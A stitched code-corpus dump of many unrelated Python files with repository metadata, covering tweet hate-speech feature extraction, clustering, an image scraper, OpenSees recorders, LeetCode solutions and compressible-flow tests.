##Modified FRE score, where sentence fixed to 1
FRE = round(206.835 - 1.015*(float(num_words)/1.0) - (84.6*float(avg_syl)),2)
twitter_objs = count_twitter_objs(tweet)
retweet = 0
if "rt" in words:
retweet = 1
features = [FKRA, FRE,syllables, avg_syl, num_chars, num_chars_total, num_terms, num_words,
num_unique_terms, sentiment['neg'], sentiment['pos'], sentiment['neu'], sentiment['compound'],
twitter_objs[2], twitter_objs[1],
twitter_objs[0], retweet]
#features = pandas.DataFrame(features)
return features
def get_feature_array(tweets):
feats=[]
for t in tweets:
feats.append(other_features(t))
return np.array(feats)
# In[4]:
def print_cm(y,y_preds, save_cm = False, save_path = None):
plt.rc('pdf', fonttype=42)
plt.rcParams['ps.useafm'] = True
plt.rcParams['pdf.use14corefonts'] = True
plt.rcParams['text.usetex'] = True
plt.rcParams['font.serif'] = 'Times'
plt.rcParams['font.family'] = 'serif'
from sklearn.metrics import confusion_matrix
confusion_matrix = confusion_matrix(y,y_preds)
matrix_proportions = np.zeros((3,3))
for i in range(0,3):
matrix_proportions[i,:] = confusion_matrix[i,:]/float(confusion_matrix[i,:].sum())
names=['Hate','Offensive','Neither']
confusion_df = pd.DataFrame(matrix_proportions, index=names,columns=names)
plt.figure(figsize=(5,5))
seaborn.heatmap(confusion_df,annot=True,annot_kws={"size": 12},cmap='gist_gray_r',cbar=False, square=True,fmt='.2f')
plt.ylabel(r'\textbf{True categories}',fontsize=14)
plt.xlabel(r'\textbf{Predicted categories}',fontsize=14)
plt.tick_params(labelsize=12)
if save_cm:
if save_path is not None:
plt.savefig(save_path)
print(f'Confusionmatrix was saved to {save_path}')
else:
save_path = 'data/confusion.png'
plt.savefig(save_path)
print(f'Confusionmatrix was saved to {save_path}')
plt.show()
# In[5]:
# Data Structure
class TweetsDataset:
def __init__(self, csv_path, tokenizer_name, use_stopwords = True, use_preprocessor= False, min_df = 10, max_df = 0.75, max_ngram = 3):
# Where data is stored
self.csv_path = csv_path
#Read data directly
self.dataframe = pd.read_csv(self.csv_path)
# Choose tokenizer
if tokenizer_name == 'casual_std':
func = lambda x: casual_tokenize(x, preserve_case=True, reduce_len=False, strip_handles=False)
self.tokenizer = func
elif tokenizer_name == 'casual_reduce':
func = lambda x: casual_tokenize(x, preserve_case=False, reduce_len=True, strip_handles=True)
self.tokenizer = func
elif tokenizer_name == 'words':
self.tokenizer = tokenize_words
elif tokenizer_name == 'orig':
self.tokenizer = tokenize
else:
raise NotImplementedError('Unknown tokenizer')
# Stopwords
if use_stopwords:
self.stopwords = nltk.corpus.stopwords.words("english").extend( ["#ff", "ff", "rt"])
else:
self.stopwords = None
# Preprocessor
if use_preprocessor:
self.preprocessor = preprocess
else:
self.preprocessor = None
# Some hyperparameters
self.min_df = min_df
self.max_df = max_df
self.max_ngram = max_ngram
# Vectorizer
self.vectorizer = TfidfVectorizer(
tokenizer=self.tokenizer, #casual_tokenize_specified,
preprocessor=self.preprocessor,
ngram_range=(1, self.max_ngram),
stop_words=self.stopwords,
use_idf=True,
smooth_idf=False,
norm=None,
decode_error='replace',
max_features=10000,
min_df=self.min_df,
max_df=self.max_df
)
# PosVectorizer
self.pos_vectorizer = TfidfVectorizer(
tokenizer=None,
lowercase=False,
preprocessor=None,
ngram_range=(1, self.max_ngram),
stop_words=None,
use_idf=False,
smooth_idf=False,
norm=None,
decode_error='replace',
max_features=5000,
min_df=5,
max_df=0.75,
)
#Construct tfidf matrix and get relevant scores
self.tfidf = self.vectorizer.fit_transform(self.dataframe['tweet']).toarray()
self.vocab = {v:i for i, v in enumerate(self.vectorizer.get_feature_names())}
self.idf_vals = self.vectorizer.idf_
self.idf_dict = {i:self.idf_vals[i] for i in self.vocab.values()}
print(f'A vocab was created. It consists of {len(self.vocab)} entries')
# POS-tagging
self.tweet_tags = [pos_tag_tweet(tweet, self.tokenizer, print_tweet = False) for tweet in self.dataframe['tweet']]
self.pos = self.pos_vectorizer.fit_transform(pd.Series(self.tweet_tags)).toarray()
self.pos_vocab = {v:i for i, v in enumerate(self.pos_vectorizer.get_feature_names())}
# Other features: this is untouched
self.feats = get_feature_array(self.dataframe['tweet'])
#Now join them all up
self.features = np.concatenate([self.tfidf,self.pos,self.feats],axis=1)
self.feature_names = [k for k,_ in self.vocab.items()]+[k for k,_ in self.pos_vocab.items()]+["FKRA", "FRE","num_syllables", "avg_syl_per_word", "num_chars", "num_chars_total", "num_terms", "num_words", "num_unique_words", "vader neg","vader pos","vader neu", "vader compound", "num_hashtags", "num_mentions", "num_urls", "is_retweet"]
self.labels = self.dataframe['class']
print(f'\n Data has been processed and is now available. Feature dim: {self.features.shape}')
| [
"58326589+carstengieshoff@users.noreply.github.com"
] | 58326589+carstengieshoff@users.noreply.github.com |
003bdc64d2887c85bbcf686d048131d20e7ac8d5 | d34d0bb4497c14b6433d303e557895ab926e1717 | /lib/bin/rstpep2html.py | bd8256da8484511c241ec36ab35aa68d527b0bd5 | [] | no_license | mujahed85/gcp-ml-wav | 6f24a17140e39a60f0e8adb2bccd020864f84b37 | f7cd6adb8fbbbd5d2d4eed009ee62f9b51fd2d12 | refs/heads/master | 2020-07-05T06:00:04.558778 | 2019-08-22T18:13:41 | 2019-08-22T18:13:41 | 202,544,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | #!/home/sandyreddy_it4/15aug/appengine-helloworld-python-master/venv/bin/python2.7
# $Id: rstpep2html.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing HTML from PEP
(Python Enhancement Proposal) documents.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates (X)HTML from reStructuredText-format PEP files. '
+ default_description)
publish_cmdline(reader_name='pep', writer_name='pep_html',
description=description)
| [
"mujahed.mca@gmail.com"
] | mujahed.mca@gmail.com |
b170bf1a5dd2f6564204d32a76592625f9e5c628 | ac7c02f29a837fdd67d2bdc77bba182080e98ed8 | /codekata/3rdcharacters.py | ce51088ffcd802a6c7f48e27801cff822fabc6db | [] | no_license | YaminiNarayanan-359/guvi | 7630c309a86365e4367fda1ddab4e966e7d1ac5b | a52b6353100b4e9b83a003e6a327fbfb174daac4 | refs/heads/master | 2020-06-03T00:08:00.389609 | 2019-07-16T06:59:53 | 2019-07-16T06:59:53 | 191,355,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | d=input()
for i in range(0,len(d)):
if(i%3==0):
print(k,end="")
| [
"noreply@github.com"
] | YaminiNarayanan-359.noreply@github.com |
1650c2935a075c9cb78b47b63d329943587999d2 | 8e4a2a7152e4b25641d72e930de8842732bcf53a | /SNAPOTT/04FrameworkPushOver/python/recorder.py | e964ef9584a7a78f411e7f7776a69321d95e79c5 | [] | no_license | Mengsen-W/OpenSeesFiles | 9b9e8865a2b802047e419c5155aff5c20ac05937 | cda268d37cd17280dc18ada8c7f1b30af0b2bd6b | refs/heads/master | 2021-12-23T23:21:28.369076 | 2021-12-22T13:14:53 | 2021-12-22T13:14:53 | 239,237,550 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,512 | py | '''
* @Description: recorder
* @Author: Mengsen.Wang
* @Date: 2020-05-29 15:27:00
* @Last Modified by: Mengsen.Wang
* @Last Modified time: 2020-05-29 15:27:00
'''
import os
import openseespy.opensees as ops
from log import logger
def recorder_create(filedir="output"):
'''
recorder create\n
Para: filedir default ./output
'''
# there is no recorder in element with 'section'
path = os.getcwd()
filepath = path+"\\"+filedir+"\\"
ops.recorder('Element', '-file', filepath+'ele0.out',
'-time', '-eleRange', 1, 47, 'localForce')
ops.recorder('Node', '-file', filepath+'node0.out', '-time',
'-nodeRange', 1, 28, '-dof', 1, 2, 3, 'disp')
ops.recorder('Node', '-file', filepath+'node8.out',
'-time', '-node', 8, '-dof', 1, 2, 3, 'disp')
ops.recorder('Node', '-file', filepath+'node7.out',
'-time', '-node', 7, '-dof', 1, 2, 3, 'disp')
ops.recorder('Node', '-file', filepath+'node12.out',
'-time', '-node', 12, '-dof', 1, 2, 3, 'disp')
ops.recorder('Node', '-file', filepath+'node20.out',
'-time', '-node', 20, '-dof', 1, 2, 3, 'disp')
ops.recorder('Element', '-file', filepath+'ele0_sec1d.out',
'-time', '-eleRange', 1, 47, 'section', 1, 'deformation')
ops.recorder('Element', '-file', filepath+'ele0_sec3d.out',
'-time', '-eleRange', 1, 47, 'section', 4, 'deformation')
logger.info("recoder created")
| [
"mengsen_wang@163.com"
] | mengsen_wang@163.com |
452e5e6b02de1e49f606a3ca71389a5b1c0c71f7 | 3654f75d57d47de0613a7d506e727f5ce306081a | /使用协程下载斗鱼首页中所有的图片.py | 8ed93808f4c14a74b7fc62d23e5c779a88074c37 | [] | no_license | YuZiHao666/douyuPaChong | 98b158250bb28ee5dd2ea6e5a811f35fead50ffd | 2de23e0976cb0e9ca6ce584ae2b7696484c72cdd | refs/heads/master | 2021-04-27T00:04:52.647278 | 2018-03-04T01:58:48 | 2018-03-04T01:58:48 | 123,747,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,604 | py | import urllib.request
import re
max_retry_count = 3
def down_img(url):
"""https://rpic.douyucdn.cn/live-cover/appCovers/2017/10/24/12017.jpg"""
for i in range(max_retry_count):
try:
response = urllib.request.urlopen(url)
# bytes
data = response.read()
# 从url中得到文件名
file_name = url[url.rfind('/')+1:]
# 打开文件用以写入
with open("img/"+ file_name, "wb") as file:
file.write(data)
except Exception as e:
print("出错 %s 正在重试" % e)
else:
break
if __name__ == '__main__':
home = """http://www.58pic.com/"""
# 请求的时候需要带上头部 可以防止初步的反爬措施
headers = {
"Host":"www.58pic.com",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
}
# 构造好请求对象 将请求提交到服务器 获取的响应就是到首页的html代码
request = urllib.request.Request(url=home, headers=headers)
# urlopen函数可以直接传入url网址 也可以指定好一个请求对象
response = urllib.request.urlopen(request)
# 将收到的响应对象中数据的bytes数据读出出来 并且解码
html_data = response.read().decode()
# 使用正则 从首页网页中 提取出所有的图片链接
img_list = re.findall(r"http://.*?\.(?:jpg|png|gif)", html_data)
print(img_list)
for img_url in img_list:
down_img(img_url) | [
"your_email@154813536@qq.com"
] | your_email@154813536@qq.com |
520d8b4de76bc22b176016cd250e44aa8922ed31 | 3a8c2bd3b8df9054ed0c26f48616209859faa719 | /Challenges/binaryTreeRightSideView.py | 5ba301ff4e30397260ef87ec8389c5ebedd932f9 | [] | no_license | AusCommsteam/Algorithm-and-Data-Structures-and-Coding-Challenges | 684f1ca2f9ee3c49d0b17ecb1e80707efe305c82 | 98fb752c574a6ec5961a274e41a44275b56da194 | refs/heads/master | 2023-09-01T23:58:15.514231 | 2021-09-10T12:42:03 | 2021-09-10T12:42:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | """
Binary Tree Right Side View
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
"""
Time Complexity O(N)
Space Complexity O(N)
"""
class Solution:
def rightSideView(self, root: TreeNode) -> List[int]:
if not root:
return []
ans = [root.val]
left = ans + self.rightSideView(root.left)
right = ans + self.rightSideView(root.right)
if len(right) > len(left):
return right
return right + left[len(right):]
"""
BFS
"""
from collections import deque
class Solution:
def rightSideView(self, root):
if not root:
return []
q, res = deque([root]), []
while q:
res.append(q[-1].val)
for _ in range(len(q)):
cur = q.popleft()
if cur.left:
q.append(cur.left)
if cur.right:
q.append(cur.right)
return res
| [
"bennyhwanggggg@users.noreply.github.com"
] | bennyhwanggggg@users.noreply.github.com |
c63925b4f49420c2678dd91c07d5abf368b8d26c | d26947e52adb2bf46c707fb392ef4e8de270c250 | /python/venv/bin/easy_install | 6c3edb735d0ced379a4aaa0bb3729cd83149088c | [
"MIT"
] | permissive | valer23/robot | 1df8182b14873f8f315ed4d95e242cc788f27c51 | 23bc23e8d699c449e6150ce24ed7a083180734b2 | refs/heads/master | 2020-07-30T20:53:25.623295 | 2019-09-24T07:45:28 | 2019-09-24T07:45:28 | 210,352,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | #!/home/valerian/Proj_maj/test_python/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"valerian.bart@gmail.com"
] | valerian.bart@gmail.com | |
da7780b102a9f8cfb62380fdbba97429eb064418 | 9f0704a088c7af65412f63208e0b9cf4d619de80 | /Clustering/Hierarchical_Clustering/hierarchical_clustering.py | a773672b87827eecc360f7dca604912399de3fa7 | [] | no_license | ChavezCitlalli/MachineL. | 6b34fdb50ade9b9ce0f5fe2946cbe25b9d886b08 | f0ce7b961783a2ea27f04feacdd1ad9b992fc697 | refs/heads/master | 2023-07-02T00:38:06.137753 | 2021-08-09T17:48:43 | 2021-08-09T17:48:43 | 394,386,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Mall_Customers.csv')
X = dataset.iloc[:, [3, 4]].values
# y = dataset.iloc[:, 3].values
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))
plt.title('Dendrogram')
plt.xlabel('Customers')
plt.ylabel('Euclidean distances')
plt.show()
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters = 5, affinity = 'euclidean', linkage = 'ward')
y_hc = hc.fit_predict(X)
# Visualising the clusters
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
| [
"zaydacit@hotmail.com"
] | zaydacit@hotmail.com |
3f343c058cf96d33a5d3b5c7981b91edc0493874 | 7773ea6f465ffecfd4f9821aad56ee1eab90d97a | /python/testData/surround/SurroundWithWhile_after.py | 43e32582970098345e4768f7e4af14d29e5282d9 | [
"Apache-2.0"
] | permissive | aghasyedbilal/intellij-community | 5fa14a8bb62a037c0d2764fb172e8109a3db471f | fa602b2874ea4eb59442f9937b952dcb55910b6e | refs/heads/master | 2023-04-10T20:55:27.988445 | 2020-05-03T22:00:26 | 2020-05-03T22:26:23 | 261,074,802 | 2 | 0 | Apache-2.0 | 2020-05-04T03:48:36 | 2020-05-04T03:48:35 | null | UTF-8 | Python | false | false | 76 | py | def foo():
while <selection>True</selection>:
print "hello"
| [
"yole@jetbrains.com"
] | yole@jetbrains.com |
177e0fb844c10dfa74004b38b345e8812b831e03 | 0ce9226dc0622e1edd93e57dcf2e88eaf77cedd6 | /leetcode/explore/October/11_subsquence_disnct.py | f9dff5ee942c4736487a7c15ad7c7a7aeeb83767 | [] | no_license | minhthe/algo-and-ds-practice | 6b09fc2174d58f8ba39ceabd80e2525ab95fe7ea | 3a9b882af8412859f204569ca11808b638acf29d | refs/heads/master | 2023-01-31T18:49:31.773115 | 2020-12-18T06:26:47 | 2020-12-18T06:26:47 | 298,933,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | '''
Greading approach: if the char you want to add, and this char not the last,
-> consider will add later not NOT to achive lexicographical order
'''
class Solution:
def removeDuplicateLetters(self, s: str) -> str:
last_index = {c: i for i,c in enumerate(s)}
stk = []
for i, c in enumerate(s):
if c in stk: continue
while stk and stk[-1] > c and last_index[stk[-1]] > i:
stk.pop()
stk.append(c)
return ''.join(stk) | [
"minhthe.007@gmail.com"
] | minhthe.007@gmail.com |
38ae7891771e0d7a34e5992b2f10f7d7e243b10b | 28162b53e25817f00c8d91a1d41c0bf0c8f861d1 | /tala_project/wsgi.py | d6e797136534217944eee05acbe8b7ba3dc8459c | [] | no_license | TiredPhilosophile/tala_v2 | 668d8dcbfe575a631ed220560f53c4abc983237a | 2fd675100090abe38f3cdca5f6dbe6cdca823a32 | refs/heads/master | 2021-01-15T13:19:41.353312 | 2015-06-11T05:02:37 | 2015-06-11T05:02:37 | 36,107,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | """
WSGI config for tala_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tala_project.settings")
#from django.core.wsgi import get_wsgi_application
#application = get_wsgi_application()
from django.core.wsgi import get_wsgi_application
from dj_static import Cling
application = Cling(get_wsgi_application())
| [
"hashimchau@gmail.com"
] | hashimchau@gmail.com |
8ce4f5afef09eb0a197dfb39a5bd0108bbf94797 | 9153dab91ab4a897059e1f92a22cc2d92d49aa21 | /helloworld.py | 169864d82d1d62954ae57358caaafc9e3b8a4bc2 | [] | no_license | mksekibang/BCN48 | d10bdff9410c62b71af961f50f3bd73c0b6b24e2 | c08c4c2f4987923e03bb9bd12559f7fccf2253d0 | refs/heads/master | 2020-06-06T16:26:50.809993 | 2012-11-06T01:09:02 | 2012-11-06T01:09:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,691 | py | #!-*- coding:utf-8 -*-"
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.ext import db
import os
import voting
import crpt
class MainPage(webapp.RequestHandler):
def get(self):
params = {
'Title':'BCN48第1回総選挙!!!',
'form':voting.votingform()
}
fpath = os.path.join(os.path.dirname(__file__),'htmldir','write.html')
html = template.render(fpath,params)
self.response.out.write(html)
def post(self):
form = voting.votingform(self.request.POST)
params = {
'Title':'入力エラーです。未入力の必須項目があります',
'form':form
}
if form.is_valid():
entity = form.save(commit=False)
ErrorFlg = False
ErrorMsg = ""
# シリアルコードの桁数チェックをいれること(シリアルコードは16文字)
if len(entity.serialno) <> 16:
ErrorFlg = True
ErrorMsg = "シリアルコードの桁数が間違っています。"
else:
serial_check = voting.votingdata.gql("WHERE serialno = :checkno",checkno = entity.serialno)
if serial_check.count() == 0:
serial_decrypt = crpt.DecryptionMessage(entity.serialno)
if serial_decrypt > '00000000' and serial_decrypt < '100000000':
params = {
'name': entity.name,
'serialno': entity.serialno
}
fpath = os.path.join(os.path.dirname(__file__),'htmldir','preview.html')
else:
ErrorFlg = True
ErrorMsg = "不正なシリアルコードです。"
else:
ErrorFlg = True
ErrorMsg = "すでに使用済みのシリアルコードです。"
if ErrorFlg:
params = {
'Title':ErrorMsg,
'form':voting.votingform()
}
fpath = os.path.join(os.path.dirname(__file__),'htmldir','write.html')
else:
fpath = os.path.join(os.path.dirname(__file__),'htmldir','write.html')
html = template.render(fpath,params)
self.response.out.write(html)
application = webapp.WSGIApplication([('/', MainPage)], debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| [
"dmitryshostakovich@gmail.com"
] | dmitryshostakovich@gmail.com |
f82b2ec22562e35971d6fe6f982dd9bbbb0b9b5c | 6663cffcb75cc2433c1eaae7e92ccd2977cd8f19 | /connect to mysql.py | 862ab8554332aa64f9aea62ee67ec2dac13a8626 | [] | no_license | LennyLenny/python-file | 8440680944bebcfdad6e5759f4c4c36a4dc0e086 | b06fd6fb156f478a21c4d61062a382adf287fa7d | refs/heads/master | 2020-04-28T03:17:58.023664 | 2019-03-11T05:31:28 | 2019-03-11T05:31:28 | 174,931,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | Python 3.6.3 (v3.6.3:2c5fed8, Oct 3 2017, 17:26:49) [MSC v.1900 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> import pymysql
>>> conn = pymysql.connect(host='localhost',user='root',password='root',db='movielist')
>>> a = conn.cursor()
>>> sql = 'SELECT * from `movie_rate`;'
>>> a.execute(sql)
Traceback (most recent call last):
File "<pyshell#4>", line 1, in <module>
a.execute(sql)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 166, in execute
result = self._query(query)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 322, in _query
conn.query(q)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 856, in query
self._affected_rows = self._read_query_result(unbuffered=unbuffered)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1057, in _read_query_result
result.read()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1340, in read
first_packet = self.connection._read_packet()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1014, in _read_packet
packet.check_error()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 393, in check_error
err.raise_mysql_exception(self._data)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\err.py", line 107, in raise_mysql_exception
raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'movielist.movie_rate' doesn't exist")
>>> print(sql)
SELECT * from `movie_rate`;
>>> a.execute(sql)
Traceback (most recent call last):
File "<pyshell#6>", line 1, in <module>
a.execute(sql)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 166, in execute
result = self._query(query)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 322, in _query
conn.query(q)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 856, in query
self._affected_rows = self._read_query_result(unbuffered=unbuffered)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1057, in _read_query_result
result.read()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1340, in read
first_packet = self.connection._read_packet()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1014, in _read_packet
packet.check_error()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 393, in check_error
err.raise_mysql_exception(self._data)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\err.py", line 107, in raise_mysql_exception
raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'movielist.movie_rate' doesn't exist")
>>> sql = 'SELECT * from `user_info`;'
>>> a.execute(sql)
3
>>>
| [
"791086166@qq.com"
] | 791086166@qq.com |
cda6a6e5e1b60598a1893d844bcba02707ddbbb7 | 282d0a84b45b12359b96bbf0b1d7ca9ee0cb5d19 | /Malware1/venv/Lib/site-packages/scipy/spatial/setup.py | 17994e6fb084330c7b91f8e312a70465a528a0ff | [] | no_license | sameerakhtar/CyberSecurity | 9cfe58df98495eac6e4e2708e34e70b7e4c055d3 | 594973df27b4e1a43f8faba0140ce7d6c6618f93 | refs/heads/master | 2022-12-11T11:53:40.875462 | 2020-09-07T23:13:22 | 2020-09-07T23:13:22 | 293,598,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:ccb99ae81e55c20bfd073d894471ea6c5a51f1cc27e19fea1bd2ebdfa959f8cd
size 2935
| [
"46763165+sameerakhtar@users.noreply.github.com"
] | 46763165+sameerakhtar@users.noreply.github.com |
121d743af8ee8b7ac6eff95e4756e10c11b93dfc | 78e93ca71a54bd11b6f51ef3936044e08782c7e3 | /batchkit_examples/speech_sdk/work_item_processor.py | cb1108528d05baf51c553dc4922e2052d930bdf2 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | microsoft/batch-processing-kit | c0134e1e395fdf7f2938101cea542dbb8d3c1f1f | 8b0a5492361ff9473ab66c2f64aaccd5340f2f62 | refs/heads/master | 2023-09-02T01:54:36.226987 | 2022-10-27T03:40:34 | 2022-10-27T03:40:34 | 265,635,442 | 29 | 19 | MIT | 2023-06-02T10:38:06 | 2020-05-20T17:14:45 | Python | UTF-8 | Python | false | false | 1,170 | py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import multiprocessing
from typing import List
from batchkit.logger import LogEventQueue
from batchkit.work_item import WorkItemRequest, WorkItemResult
from batchkit.work_item_processor import WorkItemProcessor
from batchkit_examples.speech_sdk.recognize import run_recognizer
from batchkit_examples.speech_sdk.work_item import SpeechSDKWorkItemRequest
class SpeechSDKWorkItemProcessor(WorkItemProcessor):
def __init__(self):
super().__init__()
def work_item_types(self) -> List[type]:
return [SpeechSDKWorkItemRequest]
def process_impl(self,
work_item: WorkItemRequest,
endpoint_config: dict, rtf: float,
log_event_queue: LogEventQueue, cancellation_token: multiprocessing.Event,
global_workitem_lock: multiprocessing.RLock) -> WorkItemResult:
assert isinstance(work_item, SpeechSDKWorkItemRequest)
return run_recognizer(
work_item,
rtf,
endpoint_config,
log_event_queue,
cancellation_token
)
| [
"noreply@github.com"
] | microsoft.noreply@github.com |
66ff066deef611e0bc8dba47f853afe25757b4be | 62f14fe947513ddf1e4ca8c26ae5d02099abd6cc | /tests/test_compressible.py | a49ff3d21e1e7f78b038956e6e933a00ac0f8d32 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bencleary/fluids | 79d993366cea94a87cbc3ac3e5f01311fa81956e | b1d0e00877b36c14c52d7d32c45f9359c0366459 | refs/heads/master | 2022-11-08T02:47:02.896748 | 2020-06-20T14:41:10 | 2020-06-20T14:41:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,252 | py | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, 2017 Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from fluids import *
from fluids.numerics import assert_close, assert_close1d
import pytest
def test_isothermal_work_compression():
assert_close(isothermal_work_compression(1E5, 1E6, 300), 5743.425357533477, rtol=1e-05)
def test_isentropic_work_compression():
dH = isentropic_work_compression(P1=1E5, P2=1E6, T1=300, k=1.4, eta=1)
assert_close(dH, 8125.161295388634, rtol=1e-05)
dH = isentropic_work_compression(P1=1E5, P2=1E6, T1=300, k=1.4, eta=0.78)
assert_close(dH, 10416.873455626454, rtol=1e-05)
dH = isentropic_work_compression(P1=1E5, P2=1E6, T1=300, k=1.4, eta=0.78, Z=0.9)
assert_close(dH, 9375.186110063809, rtol=1e-05)
# Other solutions - P1, P2, and eta
P1 = isentropic_work_compression(W=9375.186110063809, P2=1E6, T1=300, k=1.4, eta=0.78, Z=0.9)
assert_close(P1, 1E5, rtol=1E-5)
P2 = isentropic_work_compression(W=9375.186110063809, P1=1E5, T1=300, k=1.4, eta=0.78, Z=0.9)
assert_close(P2, 1E6, rtol=1E-5)
eta = isentropic_work_compression(W=9375.186110063809, P1=1E5, P2=1E6, T1=300, k=1.4, Z=0.9, eta=None)
assert_close(eta, 0.78, rtol=1E-5)
with pytest.raises(Exception):
isentropic_work_compression(P1=1E5, P2=1E6, k=1.4, T1=None)
def test_isentropic_T_rise_compression():
T2 = isentropic_T_rise_compression(286.8, 54050, 432400, 1.4)
assert_close(T2, 519.5230938217768, rtol=1e-05)
T2 = isentropic_T_rise_compression(286.8, 54050, 432400, 1.4, eta=0.78)
assert_close(T2, 585.1629407971498, rtol=1e-05)
# Test against the simpler formula for eta=1:
# T2 = T2*(P2/P1)^((k-1)/k)
T2_ideal = 286.8*((432400/54050)**((1.4-1)/1.4))
assert_close(T2_ideal, 519.5230938217768, rtol=1e-05)
